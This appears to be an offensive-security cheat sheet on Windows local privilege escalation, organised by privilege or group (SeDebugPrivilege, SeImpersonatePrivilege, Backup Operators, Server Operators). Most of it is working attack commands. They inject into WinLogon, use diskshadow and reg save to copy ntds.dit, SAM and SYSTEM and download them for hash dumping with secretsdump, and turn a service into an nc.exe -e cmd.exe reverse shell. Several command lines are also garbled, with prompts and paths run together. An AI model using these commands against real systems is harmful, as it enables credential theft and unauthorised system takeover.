Skip to main content

Windows Local Privilege Escalation

SeDebugPrivilege

Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt.

WinLogon PID: 3488

Adopt binary: adopt.exe

PS /home/bobbuilder> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

Usually Web (IIS) has this enabled.

  • GodPotato, printerspoofer to Privesc.

BackupOperators

PS /home/bobbuilder> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt
PS /home/bobbuilder> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.48/10.10/disk.txt", "C:\Windows\Temp\disk.txt")
PS /home/bobbuilder> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /home/bobbuilder> E:
dirPS windows/ntds/home/bobbuilder> reg save hklm\system
PS /home/bobbuilder> reg save hklm\system c:\windows\temp\system.bak
PS /home/bobbuilder> reg save hklm\sam c:\windows\temp\sam.bak
uploadPS ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dllbobbuilder> upload ./SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilder> upload ./../../../../../../SeBackupPrivilegeUtils.dll
PS /home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeUtils.dllbobbuilder> Import-Module .\SeBackupPrivilegeUtils.dll
PS /home/bobbuilder> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilder> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /home/bobbuilder> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak
bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lnhash:nthash LOCAL -outputfile ntlm-extract

Server Operators

bobbuilder:/home# upload /usr/share/windows-resources/binaries/nc.exe
PS /home/bobbuilder> sc.exe config vss binPath="C:\Path\nc.exe -e cmd.exe ip 1234"
PS /home/bobbuilder> sc.exe stop vss
PS /home/bobbuilder> sc.exe start vss